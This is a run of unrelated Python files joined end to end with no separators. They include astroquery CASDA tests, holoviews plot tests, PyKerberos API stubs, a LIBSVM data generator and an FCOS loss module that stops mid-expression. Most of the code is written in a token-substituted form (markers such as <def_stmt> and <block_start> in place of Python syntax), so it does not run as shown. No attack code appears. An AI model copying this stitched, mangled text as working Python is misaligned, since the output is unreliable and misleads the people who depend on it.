cache=<false>)<assert_stmt>isinstance(responses Table)<assert_stmt>len(responses)<eq>2<block_end><def_stmt>test_query_region_async_box patch_get<block_start>ra=333.9092<line_sep>dec=-45.8418<line_sep>width=0.5<line_sep>height=0.2<line_sep>centre=SkyCoord(ra dec unit=('deg' 'deg'))<line_sep>query_payload=Casda.query_region_async(centre width=width<times>u.deg height=height<times>u.deg cache=<false> get_query_payload=<true>)<assert_stmt>isinstance(query_payload dict)<assert_stmt>'POS'<in>query_payload<assert_stmt>query_payload['POS'].startswith('RANGE 333')<line_sep>pos_parts=query_payload['POS'].split(' ')<assert_stmt>pos_parts[0]<eq>'RANGE'<assert_stmt>isclose(float(pos_parts[1]) ra-width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[2]) ra+width/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[3]) dec-height/2 abs_tol=1e-5)<assert_stmt>isclose(float(pos_parts[4]) dec+height/2 abs_tol=1e-5)<assert_stmt>len(pos_parts)<eq>5<line_sep>responses=Casda.query_region_async(centre width=width<times>u.deg height=height<times>u.deg cache=<false>)<assert_stmt>isinstance(responses MockResponse)<block_end><def_stmt>test_filter_out_unreleased <block_start>all_records=parse(data_path('partial_unreleased.xml') verify='warn').get_first_table().to_table()<assert_stmt>all_records[0]['obs_release_date']<eq>'2017-08-02T03:51:19.728Z'<assert_stmt>all_records[1]['obs_release_date']<eq>'2218-01-02T16:51:00.728Z'<assert_stmt>all_records[2]['obs_release_date']<eq>''<assert_stmt>len(all_records)<eq>3<line_sep># This should filter out the rows with either a future obs_release_date or no obs_release_date filtered=Casda.filter_out_unreleased(all_records)<assert_stmt>filtered[0]['obs_release_date']<eq>'2017-08-02T03:51:19.728Z'<assert_stmt>filtered[0]['obs_publisher_did']<eq>'cube-502'<assert_stmt>len(filtered)<eq>1<block_end><def_stmt>test_stage_data_unauthorised 
patch_get<block_start>table=Table()<with_stmt>pytest.raises(ValueError)<as>excinfo<block_start>Casda.stage_data(table)<block_end><assert_stmt>"Credentials must be supplied"<in>str(excinfo.value)<block_end><def_stmt>test_stage_data_empty patch_get<block_start>table=Table()<line_sep>casda=Casda('user' 'password')<line_sep>urls=casda.stage_data(table)<assert_stmt>urls<eq>[]<block_end><def_stmt>test_stage_data_invalid_credentials patch_get<block_start>prefix='https://somewhere/casda/datalink/links?'<line_sep>access_urls=[prefix+'cube-220']<line_sep>table=Table([Column(data=access_urls name='access_url')])<line_sep>casda=Casda('user' '<PASSWORD>')<with_stmt>pytest.raises(requests.exceptions.HTTPError)<as>excinfo<block_start>casda.stage_data(table)<block_end><block_end><def_stmt>test_stage_data_no_link patch_get<block_start>prefix='https://somewhere/casda/datalink/links?'<line_sep>access_urls=[prefix+'cube-240']<line_sep>table=Table([Column(data=access_urls name='access_url')])<line_sep>casda=Casda('user' 'password')<line_sep>casda.POLL_INTERVAL=1<with_stmt>pytest.raises(ValueError)<as>excinfo<block_start>casda.stage_data(table)<block_end><assert_stmt>"You do not have access to any of the requested data files."<in>str(excinfo.value)<block_end><def_stmt>test_stage_data patch_get<block_start>prefix='https://somewhere/casda/datalink/links?'<line_sep>access_urls=[prefix+'cube-244']<line_sep>table=Table([Column(data=access_urls name='access_url')])<line_sep>casda=Casda('user' 'password')<line_sep>casda.POLL_INTERVAL=1<line_sep>urls=casda.stage_data(table verbose=<true>)<assert_stmt>urls<eq>['http://casda.csiro.au/download/web/111-000-111-000/askap_img.fits.checksum' 'http://casda.csiro.au/download/web/111-000-111-000/askap_img.fits']<block_end>
"""Const for notify_events."""<line_sep>DOMAIN="notify_events"<line_sep>
# Source: https://github.com/kenshohara/3D-ResNets-PyTorch/blob/master/mean.py <def_stmt>get_mean norm_value=255 dataset='activitynet'# Below values are in RGB order <block_start><assert_stmt>dataset<in>['activitynet' 'kinetics' 'ucf101']<if_stmt>dataset<eq>'activitynet'<block_start><return>[114.7748/norm_value 107.7354/norm_value 99.4750/norm_value]<block_end><elif_stmt>dataset<eq>'kinetics'# Kinetics (10 videos for each class) <block_start><return>[110.63666788/norm_value 103.16065604/norm_value 96.29023126/norm_value]<block_end><elif_stmt>dataset<eq>'ucf101'<block_start><return>[101.00131/norm_value 97.3644226/norm_value 89.42114168/norm_value]<block_end><block_end><def_stmt>get_std norm_value=255# Kinetics (10 videos for each class) <block_start><return>[38.7568578/norm_value 37.88248729/norm_value 40.02898126/norm_value]<block_end>
<import_stmt>treq<import_from_stmt>klein Klein<line_sep>app=Klein()<line_sep>@app.route("/" branch=<true>)<def_stmt>google request<block_start>d=treq.get("https://www.google.com"+request.uri)<line_sep>d.addCallback(treq.content)<line_sep><return>d<block_end>app.run("localhost" 8080)<line_sep>
<import_from_stmt>.dataset Dataset<class_stmt>TransformDataset(Dataset)<block_start>""" Dataset which transforms a given dataset with a given function. Given a function `transform`, and a `dataset`, `TransformDataset` applies the function in an on-the-fly manner when querying a sample with `__getitem__(idx)` and therefore returning `transform[dataset[idx]]`. `transform` can also be a dict with functions as values. In this case, it is assumed that `dataset[idx]` is a dict which has all the keys in `transform`. Then, `transform[key]` is applied to dataset[idx][key] for each key in `transform` The size of the new dataset is equal to the size of the underlying `dataset`. Purpose: when performing pre-processing operations, it is convenient to be able to perform on-the-fly transformations to a dataset. Args: dataset (Dataset): Dataset which has to be transformed. transforms (function/dict): Function or dict with function as values. These functions will be applied to data. """<def_stmt>__init__ self dataset transforms<block_start>super(TransformDataset self).__init__()<if_stmt><not>(isinstance(transforms dict)<or>callable(transforms))<block_start><raise>AssertionError('expected a dict of transforms or a function')<block_end><if_stmt>isinstance(transforms dict)<block_start><for_stmt>k,v transforms.items()<block_start><if_stmt><not>callable(v)<block_start><raise>AssertionError(str(k)+' is not a function')<block_end><block_end><block_end>self.dataset=dataset<line_sep>self.transforms=transforms<block_end><def_stmt>__len__ self<block_start><return>len(self.dataset)<block_end><def_stmt>__getitem__ self idx<block_start>super(TransformDataset self).__getitem__(idx)<line_sep>z=self.dataset[idx]<if_stmt>isinstance(self.transforms dict)<block_start><for_stmt>k,transform self.transforms.items()<block_start>z[k]=transform(z[k])<block_end><block_end><else_stmt><block_start>z=self.transforms(z)<block_end><return>z<block_end><block_end>
"""Provides LogPipe class to pipe output from subprocess to a log. Adapted from https://codereview.stackexchange.com/questions/6567"""<import_stmt>logging<import_stmt>threading<import_stmt>os<class_stmt>LogPipe(threading.Thread)<block_start><def_stmt>__init__ self logger level<block_start>"""Setup the object with a logger and a loglevel and start the thread"""<line_sep>super(LogPipe self).__init__()<line_sep># threading.Thread.__init__(self) self.logger=logging.getLogger(logger)<line_sep>self.daemon=<false><line_sep>self.level=level<line_sep>self.fdRead,self.fdWrite=os.pipe()<line_sep>self.pipeReader=os.fdopen(self.fdRead)<line_sep>self.start()<block_end><def_stmt>fileno self<block_start>"""Return the write file descriptor of the pipe"""<line_sep><return>self.fdWrite<block_end><def_stmt>run self<block_start>"""Run the thread, logging everything."""<for_stmt>line iter(self.pipeReader.readline '')<block_start>self.logger.log(self.level line.strip('\n'))<block_end>self.pipeReader.close()<block_end><def_stmt>close self<block_start>"""Close the write end of the pipe."""<line_sep>os.close(self.fdWrite)<block_end><block_end>
<import_stmt>logging<import_stmt>requests<import_from_stmt>tenacity before_log retry stop_after_attempt<class_stmt>MarketDataClient(object)<block_start>logger=logging.getLogger(__name__)<line_sep>base_url='http://market-data:8000'<def_stmt>_make_request self url<block_start>response=requests.get(f"{self.base_url}/{url}" headers={'content-type':'application/json'})<line_sep><return>response.json()<block_end>@retry(stop=stop_after_attempt(3) before=before_log(logger logging.DEBUG))<def_stmt>all_prices self<block_start><return>self._make_request("prices")<block_end><def_stmt>price self code<block_start><return>self._make_request(f"prices/{code}")<block_end><block_end>
<import_from_stmt>unittest SkipTest<import_from_stmt>holoviews.core NdOverlay<import_from_stmt>holoviews.core.util pd<import_from_stmt>holoviews.element Segments<import_from_stmt>.test_plot TestBokehPlot bokeh_renderer<try_stmt><block_start><import_from_stmt>bokeh.models FactorRange<block_end><except_stmt><block_start><pass><block_end><class_stmt>TestSegmentPlot(TestBokehPlot)<block_start><def_stmt>test_segments_color_selection_nonselection self<block_start>opts=dict(color='green' selection_color='red' nonselection_color='blue')<line_sep>segments=Segments([(i i<times>2 i<times>3 i<times>4 i<times>5 chr(65+i))<for>i range(10)] vdims=['a' 'b']).opts(**opts)<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>glyph_renderer=plot.handles['glyph_renderer']<line_sep>self.assertEqual(glyph_renderer.glyph.line_color 'green')<line_sep>self.assertEqual(glyph_renderer.selection_glyph.line_color 'red')<line_sep>self.assertEqual(glyph_renderer.nonselection_glyph.line_color 'blue')<block_end><def_stmt>test_segments_alpha_selection_nonselection self<block_start>opts=dict(alpha=0.8 selection_alpha=1.0 nonselection_alpha=0.2)<line_sep>segments=Segments([(i i<times>2 i<times>3 i<times>4 i<times>5 chr(65+i))<for>i range(10)] vdims=['a' 'b']).opts(**opts)<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>glyph_renderer=plot.handles['glyph_renderer']<line_sep>self.assertEqual(glyph_renderer.glyph.line_alpha 0.8)<line_sep>self.assertEqual(glyph_renderer.selection_glyph.line_alpha 1)<line_sep>self.assertEqual(glyph_renderer.nonselection_glyph.line_alpha 0.2)<block_end><def_stmt>test_segments_overlay_hover self<block_start>obj=NdOverlay({i:Segments((range(31) range(31) range(1 32) range(31)))<for>i range(5)} kdims=['Test']).opts({'Segments':{'tools':['hover']}})<line_sep>tooltips=[('Test' '@{Test}') ('x0' '@{x0}') ('y0' '@{y0}') ('x1' '@{x1}') ('y1' '@{y1}')]<line_sep>self._test_hover_info(obj tooltips)<block_end><def_stmt>test_segments_overlay_datetime_hover 
self<block_start><if_stmt>pd<is><none><block_start><raise>SkipTest("Test requires pandas")<block_end>obj=NdOverlay({i:Segments((list(pd.date_range('2016-01-01' '2016-01-31')) range(31) pd.date_range('2016-01-02' '2016-02-01') range(31)))<for>i range(5)} kdims=['Test']).opts({'Segments':{'tools':['hover']}})<line_sep>tooltips=[('Test' '@{Test}') ('x0' '@{x0}{%F %T}') ('y0' '@{y0}') ('x1' '@{x1}{%F %T}') ('y1' '@{y1}')]<line_sep>formatters={'@{x0}':"datetime" '@{x1}':"datetime"}<line_sep>self._test_hover_info(obj tooltips formatters=formatters)<block_end><def_stmt>test_segments_categorical_xaxis self<block_start>segments=Segments((['A' 'B' 'C'] [1 2 3] ['A' 'B' 'C'] [4 5 6]))<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>x_range=plot.handles['x_range']<line_sep>self.assertIsInstance(x_range FactorRange)<line_sep>self.assertEqual(x_range.factors ['A' 'B' 'C'])<block_end><def_stmt>test_segments_categorical_yaxis self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C']))<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C'])<block_end><def_stmt>test_segments_categorical_yaxis_invert_axes self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C']))<line_sep>plot=bokeh_renderer.get_plot(segments)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C'])<block_end><def_stmt>test_segments_overlay_categorical_yaxis self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C']))<line_sep>segments2=Segments(([1 2 3] ['B' 'C' 'D'] [4 5 6] ['B' 'C' 'D']))<line_sep>plot=bokeh_renderer.get_plot(segments<times>segments2)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C' 
'D'])<block_end><def_stmt>test_segments_overlay_categorical_yaxis_invert_axis self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C'])).opts(invert_yaxis=<true>)<line_sep>segments2=Segments(([1 2 3] ['B' 'C' 'D'] [4 5 6] ['B' 'C' 'D']))<line_sep>plot=bokeh_renderer.get_plot(segments<times>segments2)<line_sep>y_range=plot.handles['y_range']<line_sep>self.assertIsInstance(y_range FactorRange)<line_sep>self.assertEqual(y_range.factors ['A' 'B' 'C' 'D'][::-1])<block_end><def_stmt>test_segments_overlay_categorical_yaxis_invert_axes self<block_start>segments=Segments(([1 2 3] ['A' 'B' 'C'] [4 5 6] ['A' 'B' 'C'])).opts(invert_axes=<true>)<line_sep>segments2=Segments(([1 2 3] ['B' 'C' 'D'] [4 5 6] ['B' 'C' 'D']))<line_sep>plot=bokeh_renderer.get_plot(segments<times>segments2)<line_sep>x_range=plot.handles['x_range']<line_sep>self.assertIsInstance(x_range FactorRange)<line_sep>self.assertEqual(x_range.factors ['A' 'B' 'C' 'D'])<block_end><block_end>
##
# Copyright (c) 2006-2018 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##

"""
PyKerberos Function Description.

Documentation-only stubs for the API implemented by the C extension
module.  Every function below is a no-op placeholder that exists solely
to carry the docstring; calling one returns ``None``.
"""


class KrbError(Exception):
    """Base class for all Kerberos-related errors raised by this module."""
    pass


class BasicAuthError(KrbError):
    """Raised when basic (user name / password) authentication fails."""
    pass


class GSSError(KrbError):
    """Raised when a GSSAPI operation fails."""
    pass


def checkPassword(user, pswd, service, default_realm):
    """
    Verify that a user name and password match those normally used for
    Kerberos authentication, by checking that they can be used to obtain
    a ticket for the supplied service.  If the user name does not contain
    a realm, then ``default_realm`` is used.

    For this to work properly, Kerberos must be configured correctly on
    this machine (e.g. the edu.mit.Kerberos preference file must list the
    correct realms and KDCs).

    IMPORTANT: This method is vulnerable to KDC spoofing attacks and it
    should only be used for testing.  Do not use this in any production
    system - your security could be compromised if you do.

    @param user: A string containing the Kerberos user name.  A realm may
        be included by appending C{"@"} followed by the realm string to
        the actual user id.  If no realm is supplied, then the realm in
        the default_realm argument will be used.
    @param pswd: A string containing the password for the user.
    @param service: A string containing the Kerberos service to check
        access for.  This will be of the form C{"sss/xx.yy.zz"}, where
        C{"sss"} is the service identifier (e.g., C{"http"},
        C{"krbtgt"}), and C{"xx.yy.zz"} is the hostname of the server.
    @param default_realm: A string containing the default realm to use if
        one is not supplied in the user argument.  Note that Kerberos
        realms are normally all uppercase (e.g., C{"EXAMPLE.COM"}).
    @return: True if authentication succeeds, false otherwise.
    """


def changePassword(user, oldpswd, newpswd):
    """
    Change the user's password on the KDC.

    @param user: A string containing the Kerberos user name.  A realm may
        be included by appending C{"@"} followed by the realm string to
        the actual user id.  If no realm is supplied, the locally
        configured default realm is used.
    @param oldpswd: A string containing the old (current) password for
        the user.
    @param newpswd: A string containing the new password for the user.
    @return: True if password changing succeeds, false otherwise.
    """


def getServerPrincipalDetails(service, hostname):
    """
    Return the service principal for the server given a service type and
    hostname.  Details are looked up via the C{/etc/keytab} file.

    @param service: A string containing the Kerberos service type for the
        server.
    @param hostname: A string containing the hostname of the server.
    @return: A string containing the service principal.
    """


"""
GSSAPI Function Result Codes:

    -1 : Error
    0  : GSSAPI step continuation (only returned by 'Step' function)
    1  : GSSAPI step complete, or function return OK
"""

# Some useful result codes
AUTH_GSS_CONTINUE = 0
AUTH_GSS_COMPLETE = 1

# Some useful gss flags
GSS_C_DELEG_FLAG = 1
GSS_C_MUTUAL_FLAG = 2
GSS_C_REPLAY_FLAG = 4
GSS_C_SEQUENCE_FLAG = 8
GSS_C_CONF_FLAG = 16
GSS_C_INTEG_FLAG = 32
GSS_C_ANON_FLAG = 64
GSS_C_PROT_READY_FLAG = 128
GSS_C_TRANS_FLAG = 256


def authGSSClientInit(service, **kwargs):
    """
    Initialize a context for GSSAPI client-side authentication with the
    given service principal.  L{authGSSClientClean} must be called after
    this function returns an OK result to dispose of the context once all
    GSSAPI operations are complete.

    @param service: A string containing the service principal in the form
        C{"type@fqdn"}.
    @param principal: Optional string containing the client principal in
        the form C{"user@realm"}.
    @param gssflags: Optional integer used to set GSS flags (e.g.
        C{GSS_C_DELEG_FLAG|GSS_C_MUTUAL_FLAG|GSS_C_SEQUENCE_FLAG} will
        allow for forwarding credentials to the remote host).
    @param delegated: Optional server context containing delegated
        credentials.
    @param mech_oid: Optional GSS mech OID.
    @return: A tuple of (result, context) where result is the result code
        (see above) and context is an opaque value that will need to be
        passed to subsequent functions.
    """


def authGSSClientClean(context):
    """
    Destroy the context for GSSAPI client-side authentication.

    This function is provided for compatibility with earlier versions of
    PyKerberos but does nothing; the context object destroys itself when
    it is reclaimed.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @return: A result code (see above).
    """


def authGSSClientInquireCred(context):
    """
    Get the current user name, if any, without a client-side GSSAPI step.
    If the principal has already been authenticated via completed
    client-side GSSAPI steps then the user name of the authenticated
    principal is kept.  The user name will be available via
    L{authGSSClientUserName}.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @return: A result code (see above).
    """


"""
Address Types for Channel Bindings
https://docs.oracle.com/cd/E19455-01/806-3814/6jcugr7dp/index.html#reference-9
"""

GSS_C_AF_UNSPEC = 0
GSS_C_AF_LOCAL = 1
GSS_C_AF_INET = 2
GSS_C_AF_IMPLINK = 3
GSS_C_AF_PUP = 4
GSS_C_AF_CHAOS = 5
GSS_C_AF_NS = 6
GSS_C_AF_NBS = 7
GSS_C_AF_ECMA = 8
GSS_C_AF_DATAKIT = 9
GSS_C_AF_CCITT = 10
GSS_C_AF_SNA = 11
GSS_C_AF_DECnet = 12
GSS_C_AF_DLI = 13
GSS_C_AF_LAT = 14
GSS_C_AF_HYLINK = 15
GSS_C_AF_APPLETALK = 16
GSS_C_AF_BSC = 17
GSS_C_AF_DSS = 18
GSS_C_AF_OSI = 19
GSS_C_AF_X25 = 21
GSS_C_AF_NULLADDR = 255


def channelBindings(**kwargs):
    """
    Build a gss_channel_bindings_struct which can be passed to
    L{authGSSClientStep} to bind onto the auth.

    Details on channel bindings can be found at
    https://tools.ietf.org/html/rfc5929.  More details on the struct can
    be found at
    https://docs.oracle.com/cd/E19455-01/806-3814/overview-52/index.html

    @param initiator_addrtype: Optional integer used to set the
        initiator_addrtype; defaults to GSS_C_AF_UNSPEC if not set.
    @param initiator_address: Optional byte string containing the
        initiator_address.
    @param acceptor_addrtype: Optional integer used to set the
        acceptor_addrtype; defaults to GSS_C_AF_UNSPEC if not set.
    @param acceptor_address: Optional byte string containing the
        acceptor_address.
    @param application_data: Optional byte string containing the
        application_data.  An example would be
        'tls-server-end-point:{cert-hash}' where {cert-hash} is the hash
        of the server's certificate.
    @return: A tuple of (result, gss_channel_bindings_struct) where
        result is the result code and gss_channel_bindings_struct is the
        channel bindings structure that can be passed onto
        L{authGSSClientStep}.
    """


def authGSSClientStep(context, challenge, **kwargs):
    """
    Process a single GSSAPI client-side step using the supplied server
    data.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @param challenge: A string containing the base64-encoded server data
        (which may be empty for the first step).
    @param channel_bindings: Optional channel bindings to bind onto the
        auth request.  This struct can be built using L{channelBindings}
        and if not specified GSS_C_NO_CHANNEL_BINDINGS is passed along as
        a default.
    @return: A result code (see above).
    """


def authGSSClientResponse(context):
    """
    Get the client response from the last successful GSSAPI client-side
    step.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @return: A string containing the base64-encoded client data to be
        sent to the server.
    """


def authGSSClientResponseConf(context):
    """
    Determine whether confidentiality was enabled in the previously
    unwrapped buffer.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @return: C{1} if confidentiality was enabled in the previously
        unwrapped buffer, C{0} otherwise.
    """


def authGSSClientUserName(context):
    """
    Get the user name of the principal authenticated via the now complete
    GSSAPI client-side operations, or the current user name obtained via
    L{authGSSClientInquireCred}.  This method must only be called after
    L{authGSSClientStep} or L{authGSSClientInquireCred} return a complete
    response code.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @return: A string containing the user name.
    """


def authGSSClientUnwrap(context, challenge):
    """
    Perform the client side GSSAPI unwrap step.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @param challenge: A string containing the base64-encoded server data.
    @return: A result code (see above).
    """


def authGSSClientWrap(context, data, user=None, protect=0):
    """
    Perform the client side GSSAPI wrap step.

    @param context: The context object returned from
        L{authGSSClientInit}.
    @param data: The result of the L{authGSSClientResponse} after the
        L{authGSSClientUnwrap}.
    @param user: The user to authorize.
    @param protect: If C{0}, then just provide integrity protection.  If
        C{1}, then provide confidentiality as well.
    @return: A result code (see above).
    """


def authGSSServerInit(service):
    """
    Initialize a context for GSSAPI server-side authentication with the
    given service principal.  L{authGSSServerClean} must be called after
    this function returns an OK result to dispose of the context once all
    GSSAPI operations are complete.

    @param service: A string containing the service principal in the form
        C{"type@fqdn"}.  To initialize the context for the purpose of
        accepting delegated credentials, pass the literal string
        C{"DELEGATE"}.
    @return: A tuple of (result, context) where result is the result code
        (see above) and context is an opaque value that will need to be
        passed to subsequent functions.
    """


def authGSSServerClean(context):
    """
    Destroy the context for GSSAPI server-side authentication.

    This function is provided for compatibility with earlier versions of
    PyKerberos but does nothing; the context object destroys itself when
    it is reclaimed.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A result code (see above).
    """


def authGSSServerStep(context, challenge):
    """
    Process a single GSSAPI server-side step using the supplied client
    data.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @param challenge: A string containing the base64-encoded client data.
    @return: A result code (see above).
    """


def authGSSServerResponse(context):
    """
    Get the server response from the last successful GSSAPI server-side
    step.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A string containing the base64-encoded server data to be
        sent to the client.
    """


def authGSSServerHasDelegated(context):
    """
    Check whether a server context has delegated credentials.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A bool saying whether delegated credentials are available.
    """


def authGSSServerUserName(context):
    """
    Get the user name of the principal trying to authenticate to the
    server.  This method must only be called after L{authGSSServerStep}
    returns a complete or continue response code.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A string containing the user name.
    """


def authGSSServerTargetName(context):
    """
    Get the target name if the server did not supply its own credentials.
    This method must only be called after L{authGSSServerStep} returns a
    complete or continue response code.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A string containing the target name.
    """


def authGSSServerStoreDelegate(context):
    """
    Save the ticket sent to the server in the file
    C{/tmp/krb5_pyserv_XXXXXX}.  This method must only be called after
    L{authGSSServerStep} returns a complete or continue response code.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A result code (see above).
    """


def authGSSServerCacheName(context):
    """
    Get the name of the credential cache created with
    L{authGSSServerStoreDelegate}.  This method must only be called after
    L{authGSSServerStoreDelegate}.

    @param context: The context object returned from
        L{authGSSServerInit}.
    @return: A string containing the cache name.
    """
"""Generate synthetic data in LIBSVM format."""<import_stmt>argparse<import_stmt>io<import_stmt>time<import_stmt>numpy<as>np<import_from_stmt>sklearn.datasets make_classification<import_from_stmt>sklearn.model_selection train_test_split<line_sep>RNG=np.random.RandomState(2019)<def_stmt>generate_data args<block_start>"""Generates the data."""<line_sep>print("Generating dataset: {} rows * {} columns".format(args.rows args.columns))<line_sep>print("Sparsity {}".format(args.sparsity))<line_sep>print("{}/{} train/test split".format(1.0-args.test_size args.test_size))<line_sep>tmp=time.time()<line_sep>n_informative=args.columns<times>7<floordiv>10<line_sep>n_redundant=args.columns<floordiv>10<line_sep>n_repeated=args.columns<floordiv>10<line_sep>print("n_informative: {}, n_redundant: {}, n_repeated: {}".format(n_informative n_redundant n_repeated))<line_sep>x,y=make_classification(n_samples=args.rows n_features=args.columns n_informative=n_informative n_redundant=n_redundant n_repeated=n_repeated shuffle=<false> random_state=RNG)<line_sep>print("Generate Time: {} seconds".format(time.time()-tmp))<line_sep>tmp=time.time()<line_sep>x_train,x_test,y_train,y_test=train_test_split(x y test_size=args.test_size random_state=RNG shuffle=<false>)<line_sep>print("Train/Test Split Time: {} seconds".format(time.time()-tmp))<line_sep>tmp=time.time()<line_sep>write_file('train.libsvm' x_train y_train args.sparsity)<line_sep>print("Write Train Time: {} seconds".format(time.time()-tmp))<line_sep>tmp=time.time()<line_sep>write_file('test.libsvm' x_test y_test args.sparsity)<line_sep>print("Write Test Time: {} seconds".format(time.time()-tmp))<block_end><def_stmt>write_file filename x_data y_data sparsity<block_start><with_stmt>open(filename 'w')<as>f<block_start><for_stmt>x,y zip(x_data y_data)<block_start>write_line(f x y sparsity)<block_end><block_end><block_end><def_stmt>write_line f x y 
sparsity<block_start><with_stmt>io.StringIO()<as>line<block_start>line.write(str(y))<for_stmt>i,col enumerate(x)<block_start><if_stmt>0.0<l>sparsity<l>1.0<block_start><if_stmt>RNG.uniform(0 1)<g>sparsity<block_start>write_feature(line i col)<block_end><block_end><else_stmt><block_start>write_feature(line i col)<block_end><block_end>line.write('\n')<line_sep>f.write(line.getvalue())<block_end><block_end><def_stmt>write_feature line index feature<block_start>line.write(' ')<line_sep>line.write(str(index))<line_sep>line.write(':')<line_sep>line.write(str(feature))<block_end><def_stmt>main <block_start>"""The main function. Defines and parses command line arguments and calls the generator. """<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--rows' type=int default=1000000)<line_sep>parser.add_argument('--columns' type=int default=50)<line_sep>parser.add_argument('--sparsity' type=float default=0.0)<line_sep>parser.add_argument('--test_size' type=float default=0.01)<line_sep>args=parser.parse_args()<line_sep>generate_data(args)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
""" This file contains specific functions for computing losses of FCOS file """<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.nn functional<as>F<import_from_stmt>maskrcnn_benchmark.layers IOULoss<import_from_stmt>maskrcnn_benchmark.layers SigmoidFocalLoss<import_from_stmt>maskrcnn_benchmark.utils.comm reduce_sum get_world_size<import_from_stmt>maskrcnn_benchmark.layers smooth_l1_loss<line_sep>INF=100000000<class_stmt>FCOSLossComputation(object)<block_start>""" This class computes the FCOS losses. """<def_stmt>__init__ self cfg<block_start>self.cls_loss_func=SigmoidFocalLoss(cfg.MODEL.FCOS.LOSS_GAMMA cfg.MODEL.FCOS.LOSS_ALPHA)<line_sep>self.center_sample=cfg.MODEL.FCOS.CENTER_SAMPLE<line_sep>self.strides=cfg.MODEL.FCOS.FPN_STRIDES<line_sep>self.radius=cfg.MODEL.FCOS.POS_RADIUS<line_sep>self.loc_loss_type=cfg.MODEL.FCOS.LOC_LOSS_TYPE<line_sep># we make use of IOU Loss for bounding boxes regression, # but we found that L1 in log scale can yield a similar performance self.box_reg_loss_func=IOULoss(self.loc_loss_type)<line_sep>self.centerness_loss_func=nn.BCEWithLogitsLoss(reduction="sum")<line_sep># generate sizes of interest soi=[]<line_sep>prev_size=-1<for_stmt>s cfg.MODEL.FCOS.SIZES_OF_INTEREST<block_start>soi.append([prev_size s])<line_sep>prev_size=s<block_end>soi.append([prev_size INF])<line_sep>self.object_sizes_of_interest=soi<block_end><def_stmt>get_sample_region self gt strides num_points_per gt_xs gt_ys radius=1<block_start>num_gts=gt.shape[0]<line_sep>K=len(gt_xs)<line_sep>gt=gt[<none>].expand(K num_gts 4)<line_sep>center_x=(gt[<ellipsis> 0]+gt[<ellipsis> 2])/2<line_sep>center_y=(gt[<ellipsis> 1]+gt[<ellipsis> 3])/2<line_sep>center_gt=gt.new_zeros(gt.shape)<line_sep># no gt <if_stmt>center_x[<ellipsis> 0].sum()<eq>0<block_start><return>gt_xs.new_zeros(gt_xs.shape dtype=torch.uint8)<block_end>beg=0<for_stmt>level,n_p 
enumerate(num_points_per)<block_start>end=beg+n_p<line_sep>stride=strides[level]<times>radius<line_sep>xmin=center_x[beg:end]-stride<line_sep>ymin=center_y[beg:end]-stride<line_sep>xmax=center_x[beg:end]+stride<line_sep>ymax=center_y[beg:end]+stride<line_sep># limit sample region in gt center_gt[beg:end : 0]=torch.where(xmin<g>gt[beg:end : 0] xmin gt[beg:end : 0])<line_sep>center_gt[beg:end : 1]=torch.where(ymin<g>gt[beg:end : 1] ymin gt[beg:end : 1])<line_sep>center_gt[beg:end : 2]=torch.where(xmax<g>gt[beg:end : 2] gt[beg:end : 2] xmax)<line_sep>center_gt[beg:end : 3]=torch.where(ymax<g>gt[beg:end : 3] gt[beg:end : 3] ymax)<line_sep>beg=end<block_end>left=gt_xs[: <none>]-center_gt[<ellipsis> 0]<line_sep>right=center_gt[<ellipsis> 2]-gt_xs[: <none>]<line_sep>top=gt_ys[: <none>]-center_gt[<ellipsis> 1]<line_sep>bottom=center_gt[<ellipsis> 3]-gt_ys[: <none>]<line_sep>center_bbox=torch.stack((left top right bottom) -1)<line_sep>inside_gt_bbox_mask=center_bbox.min(-1)[0]<g>0<line_sep><return>inside_gt_bbox_mask<block_end><def_stmt>prepare_targets self points targets<block_start>object_sizes_of_interest=self.object_sizes_of_interest<line_sep>expanded_object_sizes_of_interest=[]<for_stmt>l,points_per_level enumerate(points)<block_start>object_sizes_of_interest_per_level=points_per_level.new_tensor(object_sizes_of_interest[l])<line_sep>expanded_object_sizes_of_interest.append(object_sizes_of_interest_per_level[<none>].expand(len(points_per_level) -1))<block_end>expanded_object_sizes_of_interest=torch.cat(expanded_object_sizes_of_interest 